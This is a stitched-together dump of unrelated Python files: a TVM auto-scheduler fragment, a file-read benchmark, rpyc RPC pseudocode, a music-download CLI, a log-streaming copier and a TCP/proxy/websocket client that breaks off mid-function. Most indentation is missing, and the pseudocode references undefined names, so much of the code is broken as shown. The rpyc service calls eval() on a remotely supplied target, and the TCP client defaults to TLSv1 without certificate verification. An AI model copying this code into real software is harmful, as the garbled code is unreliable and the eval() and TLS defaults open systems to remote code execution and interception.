"""Remove the safety check in the indexing function for a tensor.
This is done by monkey patching its indexing function.
After removing the check, we are allowed to create a
temporary wrong IR and fix it later in other places.
Parameters
----------
tensor: Tensor
The tensor to remove index check.
"""
# Monkey patch the indexing function
tensor.__call__ = tensor_no_check_call.__get__(tensor, Tensor)
def rewrite_compute_body(compute_tensor, new_layout):
"""Rewrite the body of a ComputeOp according to a new layout of a placeholder"""
op = compute_tensor.op
# Get layout free placeholders
layout_free_placeholders = op.attrs["layout_free_placeholders"]
assert len(layout_free_placeholders) == 1, "Only support one layout free placeholder"
placeholder_op = layout_free_placeholders[0].op
# Rewrite the index expression in body
body = []
for b in op.body:
body.append(_ffi_api.RewriteIndexForNewLayout(placeholder_op, new_layout, b))
op_node = tvm.te._ffi_api.ComputeOp(op.name, op.tag, op.attrs, op.axis, body)
num = op_node.num_outputs
outputs = tuple(op_node.output(i) for i in range(num))
return outputs[0] if num == 1 else outputs
def is_auto_scheduler_enabled():
"""Return whether the auto-scheduler is enabled.
    Returns
    -------
    enabled: bool
        Whether the auto-scheduler is enabled
"""
return PassContext.current().config.get("relay.backend.use_auto_scheduler", False)
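# Usage sketch (illustrative, not part of this module): the flag read by
# is_auto_scheduler_enabled() is a PassContext config option, so callers are
# expected to enable the auto-scheduler before building a Relay module roughly
# like this. `mod`, `params` and the log file name are placeholders.
#
#     import tvm
#     from tvm import relay, auto_scheduler
#
#     with auto_scheduler.ApplyHistoryBest("tuning_records.json"):
#         with tvm.transform.PassContext(
#             opt_level=3, config={"relay.backend.use_auto_scheduler": True}
#         ):
#             lib = relay.build(mod, target="llvm", params=params)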
|
io.py
|
from threading import Thread
from time import time
def benchmark(func):
def bench(*args, **kwargs):
start = time()
func(*args, **kwargs)
end = time()
duration = (end - start) * 1000
print("Run took {}ms".format(int(duration)))
return bench
def run(start, stop=None):
# build the start and stop args for range()
if stop is None:
args = [start]
else:
args = [start, stop]
for i in range(*args):
filename = 'files/{}.txt'.format(i)
with open(filename) as f:
f.read()
@benchmark
def unthreaded_run(start, stop=None):
run(start, stop)
@benchmark
def threaded_run(start, stop=None, thread_count=4):
    threads = []
    # split the requested file count across the threads instead of hard-coding 1000
    # (local names avoid shadowing the start/stop arguments)
    total = start if stop is None else stop - start
    block_size = total // thread_count
    for i in range(thread_count):
        block_start = (start if stop is not None else 0) + i * block_size
        block_stop = block_start + block_size
        thread = Thread(target=run, kwargs={'start': block_start, 'stop': block_stop})
        threads.append(thread)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
if __name__ == '__main__':
print("Unthreaded access to 1000 files...")
unthreaded_run(1000)
print("Threaded access to 1000 files...")
threaded_run(1000, thread_count=4)
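# Setup sketch (assumption: the benchmark expects files/0.txt .. files/999.txt to
# exist already). Something like the following, run once beforehand, creates them:
#
#     import os
#     if not os.path.isdir('files'):
#         os.makedirs('files')
#     for i in range(1000):
#         with open('files/{}.txt'.format(i), 'w') as f:
#             f.write('x' * 1024)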
|
isp-pseudo.py
|
class ServiceHandlerService(rpyc.Service): # RPyC implementation
def on_connect(self, conn):
pass
def on_disconnect(self, conn):
pass
    def exposed_echo(self, *attrs):  # pseudo-signature; attrs carries value, return_list, ...
proc = pool.Process(target=echo, args=(main_queue, main_event, value, return_list))
proc.daemon = True
proc.start()
proc.join()
return return_list
    def exposed_ping(self, *attrs):
        ...
    def exposed_introduce_me(self, *attrs):
        ...
    def exposed_detruce_me(self, *attrs):
        ...
class ServiceHandlerService(rpyc.Service):
def on_connect(self, conn):
pass
def on_disconnect(self, conn):
pass
def on_exposed_eval_service(self, target, attrs_list):
proc = pool.Process(target=eval(target), args=(main_queue, main_event, attrs_list, return_list))
proc.daemon = True
proc.start()
proc.join()
return return_list
def echo(value, return_list):
try:
conn = rpyc.connect("0.0.0.0", 18862, config={"sync_request_timeout": 300})
server = conn.root
response = server.echo("Echo", value)
return_list.append(response)
conn.close()
return return_list
except Exception:
import traceback
traceback.print_exc()
print("EXCEPT ('{0}', {1}) with fd {2}".format(addr, port, fileno))
if __name__ == '__main__':
args = get_args(name, server_list) #python isp.py [--name "name"] [--server_list google,ip,port]
service_handler_server = ThreadedServer(service=ServiceHandlerService, port=18862, ... )
    service_handler_server.start()  # pseudo: a real ThreadedServer.start() call blocks
    name = args.name
    server_list = args.server_list
    if args is not None:
for server in server_list:
server_process = start_process(server.name, server.ip, server.port) #handshake/initial connection
server_process_list.add(server_process)
while(alive):
client_listener = start_listening_process()
if (client_listener.has_inc_HS):
client_process = client_listener.fork()
client_process_list.add(client_process)
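# Minimal concrete sketch of the client/server round trip this pseudocode
# describes, using real rpyc APIs (the service body and port are illustrative):
#
#     import rpyc
#     from rpyc.utils.server import ThreadedServer
#
#     class EchoService(rpyc.Service):
#         def exposed_echo(self, value):
#             return value
#
#     # server side: ThreadedServer(EchoService, port=18862).start()
#     # client side:
#     conn = rpyc.connect("localhost", 18862)
#     print(conn.root.echo("hello"))
#     conn.close()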
|
__main__.py
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
"""
@author: HJK
@file: main.py
@time: 2019-01-08
"""
import sys
import re
import threading
import click
import logging
from . import config
from .utils import colorize
from .core import music_search, music_download, music_list_merge, get_sequence
def run():
logger = logging.getLogger(__name__)
music_list = []
thread_pool = []
errors = []
click.echo(
"\nSearching %s from ..." % colorize(config.get("keyword"), "yellow"), nl=False
)
    # Search each source in its own thread
for source in config.get("source").split():
t = threading.Thread(target=music_search, args=(source, music_list, errors))
thread_pool.append(t)
t.start()
for t in thread_pool:
t.join()
    # Separator line
click.echo("\n---------------------------\n")
    # Print any search errors
for err in errors:
logger.error("Get %s music list failed." % err[0].upper())
logger.error(err[1])
    # Sort and deduplicate the search results
if config.get("merge"):
music_list = music_list_merge(music_list)
    # Print the search result list
for index, music in enumerate(music_list):
music.idx = index
click.echo(music.info)
    # Separator line
click.echo("\n---------------------------")
    # Ask the user which indices to download
prompt = "请输入%s,支持形如 %s 的格式,输入 %s 跳过下载\n >>" % (
colorize("下载序号", "yellow"),
colorize("0 3-5 8", "yellow"),
colorize("N", "yellow"),
)
choices = click.prompt(prompt)
while choices.lower() != "n" and not re.match(
r"^((\d+\-\d+)|(\d+)|\s+)+$", choices
):
choices = click.prompt("%s%s" % (colorize("输入有误!", "red"), prompt))
selected_list = get_sequence(choices)
for idx in selected_list:
music_download(idx, music_list)
    # Continue searching after the download finishes
keyword = click.prompt("请输入要搜索的歌曲,或Ctrl+C退出\n >>")
config.set("keyword", keyword)
run()
@click.command()
@click.version_option()
@click.option(
"-k", "--keyword", prompt="请输入要搜索的歌曲,名称和歌手一起输入可以提高匹配(如 空帆船 朴树)\n >>", help="搜索关键字"
)
@click.option(
"-s",
"--source",
default="qq netease kugou baidu xiami",
help="数据源目前支持qq netease kugou baidu xiami flac",
)
@click.option("-c", "--count", default=5, help="搜索数量限制")
@click.option("-o", "--outdir", default=".", help="指定输出目录")
@click.option("-x", "--proxy", default="", help="指定代理(如http://127.0.0.1:1087)")
@click.option("-m", "--merge", default=False, is_flag=True, help="对搜索结果去重和排序(默认不去重)")
@click.option("-v", "--verbose", default=False, is_flag=True, help="详细模式")
def main(keyword, source, count, outdir, proxy, merge, verbose):
"""
Search and download music from netease, qq, kugou, baidu and xiami.
Example: music-dl -k "周杰伦"
"""
    # Initialize global configuration
config.init()
config.set("keyword", keyword)
config.set("source", source)
config.set("count", min(count, 50))
config.set("outdir", outdir)
config.set("merge", merge)
config.set("verbose", verbose)
if proxy:
proxies = {"http": proxy, "https": proxy}
config.set("proxies", proxies)
level = logging.INFO if verbose else logging.WARNING
logging.basicConfig(
level=level,
format="[%(asctime)s] %(levelname)-8s | %(name)s: %(msg)s ",
datefmt="%Y-%m-%d %H:%M:%S",
)
try:
run()
except (EOFError, KeyboardInterrupt):
sys.exit(0)
if __name__ == "__main__":
main()
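# Example invocations (based on the options defined above; the "music-dl"
# entry-point name is taken from the docstring example):
#
#     music-dl -k "空帆船 朴树"
#     music-dl -k "周杰伦" -s "qq netease" -c 10 -o ./downloads
#     music-dl -k "周杰伦" -x http://127.0.0.1:1087 -m -v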
|
streamcopy.py
|
#!/usr/bin/env python2
import os
import sys
import time
import optparse
import threading
import signal
import glob
import traceback
# PATTERN_SIZE is the size of the block used to locate the end of DST within SRC.
# note: a block that is too small (false positives) or too large (false negatives)
# will cause data to be duplicated.
PATTERN_SIZE = 4096
BUFSIZE = 1<<20
BATCH_SIZE = 1024
WAIT_DURATION = 0.1
source_paths = {}
open_files = {}
running = True
def log(msg):
sys.stderr.write("[" + time.asctime() + "] INFO " + msg + "\n")
def search_pattern(f, pattern):
if not pattern: return 0
buff = ''
pos = 0
f.seek(pos)
while True:
buff += f.read(BUFSIZE)
if len(buff) < len(pattern):
return 0
n = buff.find(pattern)
if n >= 0:
return pos + n + len(pattern)
pos += len(buff) - len(pattern) + 1
buff = buff[-len(pattern)+1:]
return 0
def get_fsize(f):
return os.fstat(f.fileno()).st_size
def find_last_pos(fin, fout):
isize = get_fsize(fin)
osize = get_fsize(fout)
vl = min(min(osize, PATTERN_SIZE), isize)
if osize <= isize and vl < isize and vl < osize:
block = fin.read(vl)
fout.seek(0)
if fout.read(vl) == block:
return osize
fout.seek(osize-vl)
pattern = fout.read(vl)
    return search_pattern(fin, pattern)
def stream(src, dst, option):
fout = open(dst, 'ab+', BUFSIZE+4096)
fin = open(src, 'rb')
pos = get_fsize(fout)
if option.resume:
pos = find_last_pos(fin, fout)
fout.seek(0, 2)
log('start copying %s at %d' % (src, pos))
fin.seek(pos)
while running:
line = fin.read(BUFSIZE)
if not line:
while running and get_fsize(fin) == pos:
if os.path.exists(src) and os.path.getsize(src) != pos:
break # rotated
time.sleep(WAIT_DURATION)
if not os.path.exists(src) or option.deleteAfter and time.time() > os.path.getmtime(src)+option.deleteAfter:
fin.close()
if os.path.exists(src):
log("remove %s" % src)
os.remove(src)
del source_paths[src]
fout.close()
return
if not running:
return
csize = get_fsize(fin)
if csize > pos:
                # the file grew; seek back to our position and keep reading
fin.seek(pos)
else:
fin.close()
fin = open(src, 'rb')
pos = 0
continue
pos += len(line)
last_copied = time.time()
while running:
try:
fout.write(line)
fout.flush()
break
except ValueError:
# closed by rotate
fout = open(dst, 'ab+', BUFSIZE+4096)
def start_thread(func, args):
def target():
try:
func(*args)
except Exception as e:
sys.stderr.write(str(e)+'\n')
t = threading.Thread(target=target)
t.daemon = True
t.start()
return t
def start_stream(src, dst, option):
def safe_stream(src, dst, option):
try:
stream(src, dst, option)
except Exception as e:
print("stream", str(e))
traceback.print_exc()
source_paths.pop(src, None)
return start_thread(safe_stream, (src, dst, option))
def discover_new_file(src, dst, option):
while running:
now = time.time()
for root, dirs, names in os.walk(src):
if len(root) > len(src)+1:
t = os.path.join(dst, root[len(src)+1:])
else:
t = root
if not os.path.exists(t):
try: os.makedirs(t)
except: pass
for n in names:
p = os.path.join(root, n)
try:
if os.path.getsize(p) == 0 and os.path.getmtime(p)+option.deleteAfter < now:
os.remove(p)
continue
if p not in source_paths and os.path.isfile(p):
t = os.path.join(dst, p[len(src)+1:])
source_paths[p] = start_stream(p, t, option)
except Exception as e:
print("found", p, str(e))
time.sleep(1)
def rotate(signum, frame):
for f in open_files:
open_files[f].close()
def interrupted(signum, frame):
print("interrupted")
global running
running = False
os._exit(1)
def main():
parser = optparse.OptionParser("streamcopy.py SRC DST [OPTIONS]")
parser.add_option("--pid", help="path for pid (SIGHUP to rotate)")
parser.add_option("--delete-after", dest="deleteAfter", type=int,
help="delete files after no new data for N seconds")
parser.add_option("--resume", action="store_true",
help="resume copying based on guessed position "
+ "(try to find first occurrence of last block of output file "
+ " in input stream).")
option, args = parser.parse_args()
if len(args) < 2:
parser.print_usage()
return
src, dst = args
if not os.path.exists(dst):
os.makedirs(dst)
if option.pid:
with open(option.pid, 'w') as f:
f.write(str(os.getpid()))
signal.signal(signal.SIGHUP, rotate)
signal.signal(signal.SIGINT, interrupted)
start_thread(discover_new_file, (src, dst, option))
while running:
time.sleep(1)
if __name__ == '__main__':
main()
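# Example invocation (based on the options defined in main(); paths are illustrative):
#
#     python2 streamcopy.py /data/src /data/dst \
#         --resume --delete-after 3600 --pid /var/run/streamcopy.pid
#
# SIGHUP (e.g. `kill -HUP $(cat /var/run/streamcopy.pid)`) triggers rotate(),
# SIGINT stops the copy loops.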
|
TcpClient.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# -------------------------------------------------------------------
# Copyright (c) 2010-2021 Denis Machard
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# -------------------------------------------------------------------
"""
Tcp client module
"""
import errno
import sys
import struct
import ssl
import time
import socket
import select
import threading
try:
import xrange
except ImportError: # support python3
xrange = range
try:
import Queue
except ImportError: # support python 3
import queue as Queue
from ea.libs.NetLayerLib import WebSocket
# unicode = str with python3
if sys.version_info > (3,):
unicode = str
else:
    # these exceptions do not exist in Python 2.x
class ConnectionAbortedError(Exception):
pass
class ConnectionRefusedError(Exception):
pass
class ConnectionResetError(Exception):
pass
PROXY_TYPE_NONE = -1
PROXY_TYPE_SOCKS4 = 0
PROXY_TYPE_SOCKS5 = 1
PROXY_TYPE_HTTP = 2
class TcpClientThread(threading.Thread):
"""
Tcp client thread
"""
def __init__(self, serverAddress=None, localAddress=('', 0), inactivityTimeout=30,
keepAliveInterval=20, timeout=5, proxyAddress=None, proxyUserId=b'client',
selectTimeout=0.01, terminator=b'\x00',
sslSupport=False, sslVersion=ssl.PROTOCOL_TLSv1, checkSsl=False,
wsSupport=False, wsMaxPayloadSize=WebSocket.WEBSOCKET_MAX_BASIC_DATA1024,
tcpKeepAlive=True, tcpKeepIdle=3, tcpKeepCnt=3, tcpKeepIntvl=3):
"""
TCP Client thread
@param serverAddress: remote ip or hostname and port
@type serverAddress: tuple
@param localAddress: local bind on ip and port
@type localAddress: tuple
@param inactivityTimeout: default value of 30 seconds
@type inactivityTimeout: Integer
@param keepAliveInterval: default value of 20 seconds, ping or pong with websocket
@type keepAliveInterval: integer
@param timeout: default value of 5 second
@type timeout: integer
@param proxyAddress: proxy address
        @type proxyAddress: tuple
@param proxyUserId: default value : client
@type proxyUserId: string
@param selectTimeout: socket io timeout, default value of 0.01
@type selectTimeout: integer
@param terminator: packet terminator, default value 0x00
        @type terminator: bytes
@param wsSupport: websocket support
@type wsSupport: boolean
@param sslSupport: ssl support
@type sslSupport: boolean
        @param sslVersion: ssl protocol version, default value of ssl.PROTOCOL_TLSv1
@type sslVersion: integer
@param wsMaxPayloadSize: websocket payload size
@type wsMaxPayloadSize: integer
"""
threading.Thread.__init__(self)
self.serverAddress = serverAddress
        self.proxyAddress = proxyAddress  # proxy address (socks4/socks5/http)
self.localAddress = localAddress
self.serverDstHostname = None
# proxy
self.proxyDstHostname = None
self.proxyConnectSuccess = False
self.proxyType = PROXY_TYPE_NONE
self.proxyUserId = proxyUserId
# web socket
self.wsCodec = WebSocket.WebSocketCodec(parent=self)
self.wsSupport = wsSupport
if wsSupport:
self.trace(
'Web socket activated - version %s' %
WebSocket.WEBSOCKET_VERSION)
self.wsHandshakeSuccess = False
self.wsKey = b''
self.wsMaxPayloadSize = wsMaxPayloadSize
# ssl
self.sslSupport = sslSupport
self.sslVersion = sslVersion
self.checkSsl = checkSsl
if sslSupport:
self.trace('Ssl activated - version %s' % self.sslVersion)
# buffer
self.buf = b''
self.bufWs = b''
self.queue = Queue.Queue(0)
self.event = threading.Event()
self.socket = None
self.running = True
self.closeSocket = False
self.inactivityServer = False
self.timeout = timeout
self.terminator = terminator
self.keepAlivePdu = b''
self.inactivityTimeout = inactivityTimeout
self.keepAliveInterval = keepAliveInterval
self.selectTimeout = float(selectTimeout)
self.tcpKeepAlive = tcpKeepAlive
self.tcpKeepIdle = tcpKeepIdle
self.tcpKeepIntvl = tcpKeepIntvl
self.tcpKeepCnt = tcpKeepCnt
self.trace('Tcp Client Thread Initialized')
def unsetProxy(self):
"""
Unset the proxy
"""
self.proxyAddress = None
self.proxyDstHostname = None
self.proxyConnectSuccess = False
self.proxyType = PROXY_TYPE_NONE
def setProxyAddress(self, ip, port):
"""
Set the destination server address
@param ip: destination ip address
@type ip: string
@param port: destination tcp port
@type port: Integer
@return:
@rtype:
"""
try:
if not len(ip):
return None
self.proxyAddress = (ip, port)
# check if ip or dns
# (hostname, aliaslist, ipaddrlist)
ret = socket.gethostbyname(str(ip))
if ret != ip:
self.proxyAddress = (ret, port)
self.proxyDstHostname = ip
except Exception as e:
self.error(e)
self.onResolveHostnameProxyFailed(err=e)
return None
return self.proxyAddress
def setServerAddress(self, ip, port):
"""
Set the destination server address
@param ip: destination ip address
@type ip: string
@param port: destination tcp port
@type port: Integer
@return:
@rtype:
"""
try:
self.serverAddress = (ip, port)
# check if ip or dns
# (hostname, aliaslist, ipaddrlist)
ret = socket.gethostbyname(str(ip))
if ret != ip:
self.serverAddress = (ret, port)
self.serverDstHostname = ip
except Exception as e:
if sys.version_info > (3,): # python 3 support
self.error(str(e))
self.onResolveHostnameFailed(err=str(e))
else:
self.error(str(e).decode('iso-8859-15'))
self.onResolveHostnameFailed(err=str(e).decode('iso-8859-15'))
return None
return self.serverAddress
def sendProxySocks4Request(self):
"""
Requesting socks4 proxy
"""
self.proxyType = PROXY_TYPE_SOCKS4
try:
destIp, destPort = self.serverAddress
# Construct the request packet
ipAddr = socket.inet_aton(destIp)
# 0x04 = version = socks4
# 0x01 = command = connect
req = b"\x04\x01" + struct.pack(">H", destPort) + ipAddr
# Add userid
req += self.proxyUserId
# send packet
self.sendPacket(packet=req)
except Exception as e:
self.error("unable to initiate proxy socks4: %s" % str(e))
def sendProxySocks5Request(self, login=None, password=None):
"""
Requesting socks5 proxy
"""
self.proxyType = PROXY_TYPE_SOCKS5
try:
if login is not None and password is not None: # The username/password
req = b"\x05\x02\x00\x02"
else:
req = b"\x05\x01\x00" # No username/password were entered
# send packet
self.sendPacket(packet=req)
except Exception as e:
self.error("unable to initiate proxy socks5: %s" % str(e))
def sendProxyHttpRequest(self):
"""
Requesting http proxy
"""
self.proxyType = PROXY_TYPE_HTTP
try:
destIp, destPort = self.serverAddress
if self.serverDstHostname is not None:
destIp = self.serverDstHostname
# Construct request
reqProxy = []
reqProxy.append("CONNECT %s:%s HTTP/1.1" % (destIp, str(destPort)))
reqProxy.append("Host: %s:%s" % (destIp, str(destPort)))
reqProxy.append("")
reqProxy.append("")
# send packet
self.sendHttpPacket(packet="\r\n".join(reqProxy))
except Exception as e:
self.error("unable to initiate proxy http: %s" % e)
def handshakeWebSocket(self, resource="/", hostport='localhost'):
"""
Build websocket handshake and send-it
"""
try:
# construct handshake
headers = []
headers.append("GET %s HTTP/1.1" % resource)
headers.append("Upgrade: websocket")
headers.append("Connection: keep-alive, upgrade")
headers.append("Host: %s" % hostport)
headers.append("Origin: http://%s" % hostport)
self.wsKey = self.wsCodec.createSecWsKey()
headers.append("Sec-WebSocket-Key: %s" % self.wsKey)
headers.append(
"Sec-WebSocket-Version: %s" %
WebSocket.WEBSOCKET_VERSION)
headers.append("")
headers.append("")
# send packet
self.sendHttpPacket(packet="\r\n".join(headers))
except Exception as e:
self.error("unable to initiate web socket: %s" % e)
def startConnection(self, threadingConnect=True):
"""
Start connection
"""
if threadingConnect:
t = threading.Thread(target=self.__startConnection)
t.start()
else:
self.__startConnection()
def __startConnection(self):
"""
Starts TCP connection (SYN)
"""
self.inactivityServer = False
self.wsHandshakeSuccess = False
self.proxyConnectSuccess = False
if self.proxyAddress is not None:
self.trace(
"connecting from %s to %s with the proxy %s" %
(str(
self.localAddress), str(
self.serverAddress), str(
self.proxyAddress)))
else:
self.trace(
"connecting from %s to %s" %
(str(
self.localAddress), str(
self.serverAddress)))
try:
self.buf = b''
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if self.tcpKeepAlive:
self.socket.setsockopt(
socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
if sys.platform == "win32":
if self.tcpKeepAlive:
self.socket.ioctl(socket.SIO_KEEPALIVE_VALS,
(1, self.tcpKeepIdle * 1000, self.tcpKeepIntvl * 1000))
elif sys.platform == "darwin":
# interval in seconds between keepalive probes
if self.tcpKeepAlive:
self.socket.setsockopt(socket.SOL_TCP,
socket.TCP_KEEPINTVL,
self.tcpKeepIntvl)
# failed keepalive probes before declaring the other end dead
if self.tcpKeepAlive:
self.socket.setsockopt(socket.SOL_TCP,
socket.TCP_KEEPCNT,
self.tcpKeepCnt)
else:
# seconds before sending keepalive probes
if self.tcpKeepAlive:
self.socket.setsockopt(socket.SOL_TCP,
socket.TCP_KEEPIDLE,
self.tcpKeepIdle)
# interval in seconds between keepalive probes
if self.tcpKeepAlive:
self.socket.setsockopt(socket.SOL_TCP,
socket.TCP_KEEPINTVL,
self.tcpKeepIntvl)
# failed keepalive probes before declaring the other end dead
if self.tcpKeepAlive:
self.socket.setsockopt(socket.SOL_TCP,
socket.TCP_KEEPCNT,
self.tcpKeepCnt)
if self.sslSupport and self.proxyAddress is None:
certReqs = ssl.CERT_NONE
if self.checkSsl:
certReqs = ssl.CERT_REQUIRED
self.socket = ssl.wrap_socket(self.socket,
cert_reqs=certReqs,
ssl_version=self.sslVersion)
self.socket.settimeout(self.timeout)
self.socket.bind(self.localAddress)
if self.proxyAddress is not None:
self.socket.connect(self.proxyAddress)
self.lastActivityTimestamp = time.time()
self.lastKeepAliveTimestamp = time.time()
self.event.set()
self.trace("proxy connected.")
self.onProxyConnection()
else:
self.socket.connect(self.serverAddress)
self.lastActivityTimestamp = time.time()
self.lastKeepAliveTimestamp = time.time()
self.event.set()
self.trace("connected.")
self.onConnection()
except socket.timeout as e:
if self.proxyAddress is not None:
self.error("socket tcp proxy %s on connection." % (str(e)))
self.onProxyConnectionTimeout(err=str(e))
else:
self.error("socket tcp %s on connection." % (str(e)))
self.onConnectionTimeout(err=str(e))
except Exception as e:
if self.proxyAddress is not None:
self.error("Proxy %s." % (str(e)))
self.onProxyConnectionRefused(err=str(e))
else:
self.error("%s." % (str(e)))
self.onConnectionRefused(err=str(e))
def closeConnection(self):
"""
Close TCP connection (RESET)
"""
self.closeSocket = True
def run(self):
"""
Main loop
"""
while self.running:
self.event.wait()
if self.running:
try:
# check if we have incoming data
if self.socket is not None:
r, w, e = select.select(
[self.socket], [], [self.socket], self.selectTimeout)
if self.socket in e:
raise EOFError(
"socket select error: disconnecting")
elif self.socket in r:
read = self.socket.recv(8192)
if not read:
raise EOFError("no more data, connection lost")
else:
self.lastActivityTimestamp = time.time()
self.buf = b''.join([self.buf, read])
self.onIncomingData()
# Check inactivity timeout
elif self.inactivityTimeout:
if time.time() - self.lastActivityTimestamp > self.inactivityTimeout:
if self.proxyAddress is not None:
raise EOFError(
"Inactivity proxy/server timeout")
else:
raise EOFError("Inactivity timeout")
if self.wsSupport:
# Prepare Keep-Alive if needed
keepAlive = False
if self.wsSupport and self.wsHandshakeSuccess:
keepAlive = True
if keepAlive:
if self.keepAliveInterval:
if time.time() - self.lastKeepAliveTimestamp > self.keepAliveInterval:
self.lastKeepAliveTimestamp = time.time()
wsping, pingId = self.wsCodec.encodePing()
self.trace(
"sending ws ping message id=%s" % pingId)
self.queue.put(wsping)
else: # old style
# Prepare Keep-Alive if needed
keepAlive = False
if self.proxyAddress is not None and self.proxyConnectSuccess:
keepAlive = True
else:
if self.proxyAddress is None:
keepAlive = True
# Send (queue) a Keep-Alive if needed, old style
if keepAlive:
if self.keepAliveInterval:
if time.time() - self.lastKeepAliveTimestamp > self.keepAliveInterval:
self.lastKeepAliveTimestamp = time.time()
# self.lastActivityTimestamp = time.time()
self.trace("sending keep-alive")
self.sendPacket(self.keepAlivePdu)
# send queued messages
while not self.queue.empty():
r, w, e = select.select(
[], [
self.socket], [
self.socket], self.selectTimeout)
if self.socket in e:
raise EOFError(
"socket select error when sending a message: disconnecting")
elif self.socket in w:
try:
message = self.queue.get(False)
self.socket.sendall(message)
del message
except Queue.Empty:
if self.closeSocket:
self.event.set()
except Exception as e:
self.error(
"unable to send message: " + str(e))
else:
break
except EOFError as e:
if "Inactivity timeout" in str(e):
self.error("disconnecting, inactivity timeout")
self.inactivityServer = True
# self.onInactivityTimeout()
self.event.clear()
self.closeSocket = True
else:
self.error("disconnected by the server: %s" % str(e))
self.onDisconnection(byServer=True)
self.event.clear()
# new with python3
except ConnectionAbortedError:
self.error("connection aborted by peer")
self.onDisconnection(byServer=True)
self.event.clear()
except ConnectionRefusedError:
self.error("connection refused by peer")
self.onDisconnection(byServer=True)
self.event.clear()
except ConnectionResetError:
self.error("connection reseted by peer")
self.onDisconnection(byServer=True)
self.event.clear()
# end of new
# new in v20, for alpine support
except select.error as e:
_errno, _ = e
if _errno != errno.EINTR:
raise
# end of new
except Exception as e:
if "[Errno 10054]" in str(e):
self.error("connection reseted by peer")
self.onDisconnection(byServer=True)
self.event.clear()
else:
self.error("generic error on run: %s" % str(e))
self.closeSocket = True
self.event.clear()
# close socket
if self.closeSocket:
self.trace("cleanup socked")
if self.socket is not None:
# cleanup the queue
while not self.queue.empty():
try:
message = self.queue.get(False)
self.socket.sendall(message)
except Queue.Empty:
pass
# close the tcp connection
self.trace("closing socket")
self.socket.close()
# cleanup the buffer
self.buf = b''
self.closeSocket = False
self.onDisconnection(
inactivityServer=self.inactivityServer)
self.event.clear()
self.trace("closed")
self.onDisconnection()
def onIncomingData(self):
"""
Called on incoming data
"""
try:
if self.running:
# handle proxy handshake
readTrueData = False
if self.proxyAddress is not None and not self.proxyConnectSuccess and self.buf:
self.trace(
'data received for proxy handshake of len %s' % len(
self.buf))
readTrueData = self.decodeProxyResponse()
if self.proxyConnectSuccess:
self.onProxyConnectionSuccess()
else:
readTrueData = True
# handle websocket handshake
readTrueData = False
if self.wsSupport and not self.wsHandshakeSuccess and self.buf:
if not readTrueData and not self.proxyConnectSuccess and self.proxyAddress is not None:
pass
else:
self.trace(
'data received for ws handshake of len %s' % len(
self.buf))
readTrueData = self.decodeWsHandshake()
if self.wsHandshakeSuccess:
self.onWsHanshakeSuccess()
else:
readTrueData = True
# handle other data
if readTrueData: # other than proxy and websocket handshake
if self.wsSupport:
(data, opcode, left, needmore) = self.wsCodec.decodeWsData(
buffer=self.buf)
self.buf = left
if not needmore:
if opcode == WebSocket.WEBSOCKET_OPCODE_TEXT:
self.bufWs = b''.join([self.bufWs, data])
else:
if opcode == WebSocket.WEBSOCKET_OPCODE_PONG:
self.trace(
"received ws pong message id=%s" % data)
elif opcode == WebSocket.WEBSOCKET_OPCODE_PING:
self.trace(
"received ws ping message id=%s" % data)
wspong = self.wsCodec.encodePong(data=data)
self.queue.put(wspong)
self.trace(
"sending pong message id=%s" % data)
else:
self.error(
'unknown ws opcode received: %s' % opcode)
self.readBufferWs()
if len(self.buf) >= 2:
self.onIncomingData()
else: # old style
self.readBuffer()
except Exception as e:
self.error("error on incoming data: %s" % e)
def readBufferWs(self):
"""
Read buffer for websocket
"""
pdus = self.bufWs.split(self.terminator)
for pdu in pdus[:-1]:
self.handleIncomingPacket(pdu)
self.bufWs = pdus[-1]
def readBuffer(self):
"""
Read tcp buffer
"""
pdus = self.buf.split(self.terminator)
for pdu in pdus[:-1]:
if not pdu == self.keepAlivePdu:
self.handleIncomingPacket(pdu)
else:
self.trace("received keep-alive from server")
self.buf = pdus[-1]
def decodeWsHandshake(self):
"""
Decode websocket handshake
@return: True if the websocket handshake is successful, False otherwise
@rtype: boolean
"""
readTrueData = False
try:
if self.buf.find(b"\r\n\r\n") != -1:
datasplitted = self.buf.split(b"\r\n\r\n", 1)
rsp = datasplitted[0]
self.trace('ws complete response received')
statusline = rsp.splitlines()[0].split(b" ", 2)
if statusline[0] not in (b"HTTP/1.1"):
self.buf = b''
self.closeConnection()
self.error("Malformed HTTP ws message: %s" % statusline)
self.onWsHanshakeError(
err="Malformed HTTP message ws: %s" %
statusline)
else:
statuscode = int(statusline[1])
if statuscode != 101:
self.buf = b''
self.closeConnection()
self.error(
"Handshake ws refused\nInvalid http status code: %s" %
statuscode)
self.onWsHanshakeError(
err="Handshake ws refused\nInvalid http status code %s" %
statuscode)
else:
# checking ws headers
if not self.wsCodec.checkingWsHeaders(
response=rsp, key=self.wsKey):
self.buf = b''
self.closeConnection()
self.error("Handshake ws refused, invalid headers")
self.onWsHanshakeError(err="Handshake ws refused")
else:
self.trace('Ws handshake accepted')
self.wsHandshakeSuccess = True
if len(datasplitted) > 1:
self.buf = datasplitted[1]
else:
self.buf = b''
readTrueData = True
else:
raise Exception('need more ws headers on response')
except Exception as e:
self.trace(e)
return readTrueData
def decodeProxyResponse(self):
"""
Decode proxy response
        @return: True when client is ready to receive application data, False otherwise
@rtype: boolean
"""
readTrueData = False
try:
# handle socks4
if self.proxyType == PROXY_TYPE_SOCKS4:
if ord(self.buf[0]) != 0: # bad version on response
